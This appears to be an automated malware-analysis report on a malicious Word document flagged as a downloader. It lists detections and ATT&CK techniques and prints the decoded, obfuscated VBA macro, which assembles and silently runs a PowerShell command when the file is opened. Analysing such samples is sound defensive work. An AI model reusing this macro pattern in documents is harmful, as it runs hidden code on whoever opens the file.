MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands upon opening. The ClamAV detection 'Doc.Downloader.Sonbokli-6846008-0' further supports its malicious nature as a downloader. The script attempts to execute 'shell.exe' which is likely part of a payload download and execution chain.
Heuristics 5
-
ClamAV: Doc.Downloader.Sonbokli-6846008-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sonbokli-6846008-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1822 bytes |
SHA-256: dbd160de72ea3049d73ab069bd28275006341554999a2a001b461d4fe2c3967d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim bU6vCzJX(3 To 59) As Long
bU6vCzJX(3) = 3030 / 101
Dim zZPTB7wv(25) As Byte
Call w("er")
End Sub
Attribute VB_Name = "tNoAtYk1"
Sub w(C5ogvtfD1)
Dim UiELyv0AS(9 To 40) As String
UiELyv0AS(9) = "K8v15m"
Dim c5VjYtSR As Long
c5VjYtSR = (-75 + 105) * (12)
Dim MbTtU As String
MbTtU = FnLcCWi
Dim NsC6kO() As Byte
Dim ZXvVG0t(11 To 136) As Long
ZXvVG0t(11) = -332 + 359
Dim SH7VT4ME(10 To 151) As Long
SH7VT4ME(10) = 142 - 16
Dim fa39UDK5(13 To 57) As String
fa39UDK5(13) = "LNJ6a9k"
anlQq = "shell.exe "
Dim hDu7PHV() As Byte
Dim ZqjrI As Long
ZqjrI = (-1149 + 1172) + (44)
Shell OIrqRNQO() _
& C5ogvtfD1 _
& anlQq _
& xQuMRm _
, 0
End Sub
Attribute VB_Name = "PixItk6Q"
Public Function OIrqRNQO() As String
Dim GRZ9Tf As String
GRZ9Tf = h53ChPif
Dim Aq50XnySU
Aq50XnySU = UJ62G3bwq
Dim BkiPha7Qv As String
BkiPha7Qv = nnwu0tE
Dim xEKYzWx() As Byte
OIrqRNQO = "pow"
End Function
Attribute VB_Name = "KVbzA5Iw"
Public Function xQuMRm()
Dim u8ZLRaym As Object
Set u8ZLRaym = New f
Dim dVeGKh9gY(8 To 199) As String
dVeGKh9gY(8) = "RW4Px3hng"
Dim BjwIe9U As String
BjwIe9U = u8ZLRaym.de.Text
xQuMRm = BjwIe9U
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{1D68F526-8010-4C15-9FFA-531E1EA83EBD}{396EA2C9-0B43-436C-825B-75458B7472F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.